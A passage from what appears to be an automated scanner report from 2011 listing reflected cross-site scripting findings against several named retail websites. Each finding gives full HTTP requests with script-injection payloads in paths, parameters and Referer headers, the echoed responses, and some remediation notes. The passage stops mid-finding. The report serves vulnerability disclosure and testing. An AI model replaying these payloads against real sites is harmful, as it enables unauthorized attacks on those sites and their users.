<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="www.charlottes-sadd
...[SNIP]...
<b>/?bcfc8<script>alert(1)</script>483939ae55c=1 </b>
...[SNIP]...

1.21. http://www.charlottes-saddlery.com/mm5/neoimages/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.charlottes-saddlery.com
Path:   /mm5/neoimages/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ad41<script>alert(1)</script>bfa7fcb98cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mm57ad41<script>alert(1)</script>bfa7fcb98cc/neoimages/favicon.ico HTTP/1.1
Host: www.charlottes-saddlery.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mm5-COS-basket-id=75c2ad7cf358b45e59a1368c5e7d0a21; __utma=242017360.1678445905.1317392735.1317392735.1317392735.1; __utmb=242017360.1.10.1317392735; __utmc=242017360; __utmz=242017360.1317392735.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 14:25:36 GMT
Server: Apache
Set-Cookie: mm5-COS-basket-id=75c2ad7cf358b45e59a1368c5e7d0a21; expires=Sat, 29-Sep-2012 14:25:36 GMT; path=/; HttpOnly
Content-Length: 17256
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="www.charlottes-sadd
...[SNIP]...
<b>/mm57ad41<script>alert(1)</script>bfa7fcb98cc/neoimages/favicon.ico </b>
...[SNIP]...

1.22. http://www.charlottes-saddlery.com/mm5/neoimages/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.charlottes-saddlery.com
Path:   /mm5/neoimages/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6cf3<script>alert(1)</script>ad1a86374cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mm5/neoimagesf6cf3<script>alert(1)</script>ad1a86374cc/favicon.ico HTTP/1.1
Host: www.charlottes-saddlery.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mm5-COS-basket-id=75c2ad7cf358b45e59a1368c5e7d0a21; __utma=242017360.1678445905.1317392735.1317392735.1317392735.1; __utmb=242017360.1.10.1317392735; __utmc=242017360; __utmz=242017360.1317392735.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 14:25:41 GMT
Server: Apache
Set-Cookie: mm5-COS-basket-id=75c2ad7cf358b45e59a1368c5e7d0a21; expires=Sat, 29-Sep-2012 14:25:41 GMT; path=/; HttpOnly
Content-Length: 17256
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="www.charlottes-sadd
...[SNIP]...
<b>/mm5/neoimagesf6cf3<script>alert(1)</script>ad1a86374cc/favicon.ico </b>
...[SNIP]...

1.23. http://www.charlottes-saddlery.com/mm5/neoimages/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.charlottes-saddlery.com
Path:   /mm5/neoimages/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 50859<script>alert(1)</script>4cbf607adeb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mm5/neoimages/favicon.ico50859<script>alert(1)</script>4cbf607adeb HTTP/1.1
Host: www.charlottes-saddlery.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mm5-COS-basket-id=75c2ad7cf358b45e59a1368c5e7d0a21; __utma=242017360.1678445905.1317392735.1317392735.1317392735.1; __utmb=242017360.1.10.1317392735; __utmc=242017360; __utmz=242017360.1317392735.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 14:25:43 GMT
Server: Apache
Set-Cookie: mm5-COS-basket-id=75c2ad7cf358b45e59a1368c5e7d0a21; expires=Sat, 29-Sep-2012 14:25:43 GMT; path=/; HttpOnly
Content-Length: 17256
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="www.charlottes-sadd
...[SNIP]...
<b>/mm5/neoimages/favicon.ico50859<script>alert(1)</script>4cbf607adeb </b>
...[SNIP]...

1.24. http://www.originalabsinthe.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.originalabsinthe.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa16"><script>alert(1)</script>7e0f6c5329c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bfa16"><script>alert(1)</script>7e0f6c5329c=1 HTTP/1.1
Host: www.originalabsinthe.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=10&c2=42
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:50:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 45241

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="en">
<head>
<title>Absinth - Buy Absinthe Online, Thujone, Wormwood & Absinthe Green Fairy</title>
<meta name="
...[SNIP]...
<link rel="canonical" href="http://www.originalabsinthe.com/?bfa16"><script>alert(1)</script>7e0f6c5329c=1" />
...[SNIP]...

1.25. http://www.techchecks.net/search.asp [Search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.techchecks.net
Path:   /search.asp

Issue detail

The value of the Search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba9d"><script>alert(1)</script>8f01bb7594e was submitted in the Search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /search.asp HTTP/1.1
Host: www.techchecks.net
Proxy-Connection: keep-alive
Content-Length: 54
Cache-Control: max-age=0
Origin: http://www.techchecks.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.techchecks.net/search.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCBDSCBD=NHBDCNMCHAEIIILJBBIOHCPB; WRUID=837949778.985356788; __utma=123994895.1545996966.1317392834.1317392834.1317392834.1; __utmb=123994895.7.10.1317392834; __utmc=123994895; __utmz=123994895.1317392834.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __support_check=1

Store_Code=check&Screen=SRCH&Search=xss+carbon+depositcba9d"><script>alert(1)</script>8f01bb7594e

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:31:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 22618
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
   <TITLE></TITLE>
   <meta http-equiv="Content-Language" content="en-us">
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <meta name="Author" content="Du
...[SNIP]...
<INPUT TYPE="text" NAME="Search" SIZE="40" VALUE="xss carbon depositcba9d"><script>alert(1)</script>8f01bb7594e">
...[SNIP]...

1.26. http://www.techchecks.net/search.asp [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.techchecks.net
Path:   /search.asp

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6ee5"><script>alert(1)</script>2dd870bdfde was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /search.asp HTTP/1.1
Host: www.techchecks.net
Proxy-Connection: keep-alive
Content-Length: 54
Cache-Control: max-age=0
Origin: http://www.techchecks.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.techchecks.net/accessories.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCBDSCBD=NHBDCNMCHAEIIILJBBIOHCPB; WRUID=837949778.985356788; __utma=123994895.1545996966.1317392834.1317392834.1317392834.1; __utmb=123994895.6.10.1317392834; __utmc=123994895; __utmz=123994895.1317392834.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __support_check=1

Store_Code=check&Screen=SRCH&search=xss+carbonc6ee5"><script>alert(1)</script>2dd870bdfde&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:31:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 22610
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
   <TITLE></TITLE>
   <meta http-equiv="Content-Language" content="en-us">
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <meta name="Author" content="Du
...[SNIP]...
<INPUT TYPE="text" NAME="Search" SIZE="40" VALUE="xss carbonc6ee5"><script>alert(1)</script>2dd870bdfde">
...[SNIP]...

1.27. http://www.dickssportinggoods.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dickssportinggoods.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 157de"><script>alert(1)</script>72edbca4617 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.dickssportinggoods.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: 157de"><script>alert(1)</script>72edbca4617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:25:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 268185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1716016;type=homep684;cat=homep600;u1=;u2=1;u3=;u4=;u5=157de"><script>alert(1)</script>72edbca4617;ord=1;num=76600298?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.28. http://www.dickssportinggoods.com/home/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dickssportinggoods.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434b3"><script>alert(1)</script>ebd2fa0ee62 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.dickssportinggoods.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: 434b3"><script>alert(1)</script>ebd2fa0ee62
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:24:59 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 268185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1716016;type=homep684;cat=homep600;u1=;u2=1;u3=;u4=;u5=434b3"><script>alert(1)</script>ebd2fa0ee62;ord=1;num=76972899?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.29. http://www.fogdog.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fogdog.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd438"><script>alert(1)</script>7f79323baf1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.fogdog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=dd438"><script>alert(1)</script>7f79323baf1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:24:58 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45302


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Checking productPreviewAllowed -->


   
...[SNIP]...
<IMG SRC="http://ad.doubleclick.net/activity;src=1351639;type=fogdo858;cat=fogdo724;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=dd438"><script>alert(1)</script>7f79323baf1;u6=;u7=;ord=1;num=1?" WIDTH=1 HEIGHT=1 BORDER=0>
...[SNIP]...

1.30. http://www.fogdog.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fogdog.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5591'-alert(1)-'065a7ce4ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.fogdog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=c5591'-alert(1)-'065a7ce4ef
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:25:01 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45269


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Checking productPreviewAllowed -->


   
...[SNIP]...
<IMG SRC="http://ad.doubleclick.net/activity;src=1351639;type=fogdo858;cat=fogdo724;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=c5591'-alert(1)-'065a7ce4ef;u6=;u7=;ord=1;num='+ a + '?" WIDTH=1 HEIGHT=1 BORDER=0>
...[SNIP]...

1.31. http://www.fogdog.com/home/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fogdog.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad4be'-alert(1)-'7c86dfaa039 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home/index.jsp HTTP/1.1
Host: www.fogdog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=ad4be'-alert(1)-'7c86dfaa039
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:25:02 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45272


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Checking productPreviewAllowed -->


   
...[SNIP]...
<IMG SRC="http://ad.doubleclick.net/activity;src=1351639;type=fogdo858;cat=fogdo724;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=ad4be'-alert(1)-'7c86dfaa039;u6=;u7=;ord=1;num='+ a + '?" WIDTH=1 HEIGHT=1 BORDER=0>
...[SNIP]...

1.32. http://www.fogdog.com/home/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fogdog.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58847"><script>alert(1)</script>4268cd10276 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.fogdog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=58847"><script>alert(1)</script>4268cd10276
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:25:01 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45302


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Checking productPreviewAllowed -->


   
...[SNIP]...
<IMG SRC="http://ad.doubleclick.net/activity;src=1351639;type=fogdo858;cat=fogdo724;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=58847"><script>alert(1)</script>4268cd10276;u6=;u7=;ord=1;num=1?" WIDTH=1 HEIGHT=1 BORDER=0>
...[SNIP]...

1.33. http://www.modells.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.modells.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 457c8"><script>alert(1)</script>c19fd1e3999 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.modells.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: 457c8"><script>alert(1)</script>c19fd1e3999
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

